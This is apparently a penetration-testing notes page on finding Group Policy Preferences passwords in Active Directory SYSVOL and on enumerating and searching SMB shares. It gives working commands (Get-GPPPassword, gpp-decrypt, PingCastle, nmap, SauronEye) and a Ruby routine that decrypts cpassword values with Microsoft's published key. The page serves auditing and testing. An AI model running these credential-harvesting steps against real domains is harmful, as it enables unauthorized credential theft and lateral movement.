InfoSec Notes

Exploitation - GPP and shares searching

Overview

The SYSVOL folder, accessible on all Domain Controllers to all authenticated users, should be carefully reviewed for sensitive information (notably the Group Policy Preferences (GPP) data). Some content may be accessible to unauthenticated users (NULL session or GUEST) and can be a way to gain authenticated access to the domain.

SMB

The Server Message Block (SMB) protocol, one version of which was also known as Common Internet File System (CIFS), is an application-layer network protocol used for providing shared access to files, printers, and serial ports and miscellaneous communications between nodes on a network. It also provides an authenticated inter-process communication mechanism. Most usage of SMB involves computers running Microsoft Windows.

Group Policy

Group Policy is a feature of the Microsoft Windows NT family of operating systems that controls the working environment of user accounts and computer accounts. Group Policy provides centralized management and configuration of operating systems, applications, and users' settings in an Active Directory environment. A version of Group Policy called Local Group Policy (LGPO or LocalGPO) also allows Group Policy Object (GPO) management on standalone and non-domain joined computers.

Two kinds of Group Policy exist: Group Policy Objects (GPO) and Group Policy Preferences (GPP). One of the most useful features of GPP is the ability to store and use credentials in several scenarios (local user creation, drive mapping, etc.). When a new GPP is created, an associated XML file is created in the SYSVOL share with the relevant configuration data and, if a password is provided, it is stored AES-256 encrypted. Microsoft published the AES key, which can be used to decrypt the password. Since authenticated users (any domain user or user in a trusted domain) have read access to the SYSVOL share, anyone in the domain can search it for XML files containing a cpassword field, which is the field that holds the AES-encrypted password. There are a few more differences between the two; for additional details refer to the following article: http://techgenix.com/policies-vs-preferences/.

SYSVOL

The SYSVOL is the domain-wide share in Active Directory to which all authenticated users have read access. The SYSVOL contains logon scripts, group policy data, and other domain-wide data which needs to be available anywhere there is a Domain Controller (since the SYSVOL is automatically synchronized and shared among all Domain Controllers).

In addition to the GPP data potentially containing passwords, other sensitive information can be stored in the SYSVOL share, and its content should be reviewed.

Group Policy Preferences (GPP) password searching

As stated above, GPP may be used in the domain to manage and configure local accounts on domain-joined computers. The GPP defined may thus contain passwords, and the SYSVOL folder should be reviewed.

PingCastle's healthcheck searches a Domain Controller's SYSVOL share for any XML (*.xml) files that may contain a cpassword field and automatically decrypts any password found.

Additionally, the Get-GPPPassword cmdlet of the PowerSploit suite searches a Domain Controller's SYSVOL share for groups.xml, scheduledtasks.xml, services.xml and datasources.xml files and returns any (decrypted) cpassword passwords:

Get-GPPPassword
Get-GPPPassword -Server <DC>

To manually search for cpassword field / passwords in GPP, the Agent Ransack GUI or the SauronEye CLI tools can be used. Refer to the Distributed searching tools section below for more information.

The Ruby gpp-decrypt script can be used to decrypt a GPP password (the cpassword value):

gpp-decrypt <ENC_PASSWORD>
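As an added example (not code from the page, PowerSploit, PingCastle or gpp-decrypt), here is a small Ruby audit routine that does what those tools do: it pulls the cpassword attributes out of a GPP XML document and decrypts them with the key Microsoft published. The Groups.xml fragment and the svc_backup account are constructed sample data; the encrypt helper exists only to build that sample offline.

```ruby
require "openssl"

# AES-256 key published by Microsoft in MS-GPPREF; the IV is sixteen zero bytes.
GPP_KEY = ["4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b"].pack("H*")

def gpp_cipher(mode) # mode is :encrypt or :decrypt
  c = OpenSSL::Cipher.new("aes-256-cbc")
  c.send(mode)
  c.key = GPP_KEY
  c.iv = "\x00" * 16
  c
end

# Reverse the cpassword encoding: restore the stripped base64 '=' padding, AES-256-CBC
# decrypt (OpenSSL checks and removes the PKCS#7 padding) and decode the UTF-16LE text.
# A value that is not a GPP cpassword raises OpenSSL::Cipher::CipherError.
def decrypt_cpassword(cpassword)
  padded = cpassword + "=" * ((4 - cpassword.length % 4) % 4)
  c = gpp_cipher(:decrypt)
  (c.update(padded.unpack1("m0")) + c.final).force_encoding("UTF-16LE").encode("UTF-8")
end

# Build a cpassword the way Group Policy does; used here only to construct sample data.
def encrypt_cpassword(password)
  c = gpp_cipher(:encrypt)
  [c.update(password.encode("UTF-16LE")) + c.final].pack("m0").delete("=")
end

# Extract and decrypt every non-empty cpassword attribute of a GPP XML document
# (Groups.xml, ScheduledTasks.xml, Services.xml, DataSources.xml), together with the
# userName attribute of the same <Properties> element when present.
def find_cpasswords(xml)
  xml.scan(/<Properties\b([^>]*)>/).flatten.each_with_object([]) do |attrs, found|
    cp = attrs[/\bcpassword="([^"]*)"/, 1]
    next if cp.nil? || cp.empty?
    found << { user: attrs[/\buserName="([^"]*)"/, 1], password: decrypt_cpassword(cp) }
  end
end

# Constructed Groups.xml fragment (not a real SYSVOL file); the cpassword is generated above.
SAMPLE_GROUPS_XML = <<~XML
  <Groups>
    <User name="svc_backup">
      <Properties action="U" cpassword="#{encrypt_cpassword('Local*P4ssword!')}"
        changeLogon="0" noChange="1" neverExpires="1" userName="svc_backup"/>
    </User>
  </Groups>
XML
find_cpasswords(SAMPLE_GROUPS_XML).each { |h| puts "#{h[:user]}: #{h[:password]}" }
```

Run the same find_cpasswords over every *.xml under \\<DC>\SYSVOL\<domain>\Policies to find GPP credentials that should be removed.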

Distributed shares searching

Enumerate accessible shares

PingCastle's share scanner can be used to enumerate the machines joined to the current, or specified, Active Directory domain and then retrieve the shares exposed by each machine through direct SMB queries.

PingCastle.exe --scanner share
PingCastle.exe --server <DC_FQDN | DC_IP> --user "<DOMAIN>\<USERNAME>" --password "<PASSWORD>" --scanner share

From an unauthenticated perspective, nmap can be used to scan the network for exposed SMB services and to list the shares accessible on them, and nbtscan to enumerate NetBIOS names over a range:

nmap --script smb-enum-shares.nse -p 445 <TARGETS>
nbtscan -r <RANGE>

For more practical information about shares listing and searching, refer to the [L7 SMB] - Methodology note.

Distributed searching tools

The Agent Ransack GUI or the SauronEye CLI file searching tools can be used to search files on SMB shares for specified keywords or regexes, such as pass*.

SauronEye.exe --directories <LOCAL_DIRECTORY | NETWORK_SHARE> <...> --filetypes <.FILE_EXTENSION> <...> --contents --keywords <KEYWORD | BASIC_REGEX>

Last updated 3 years ago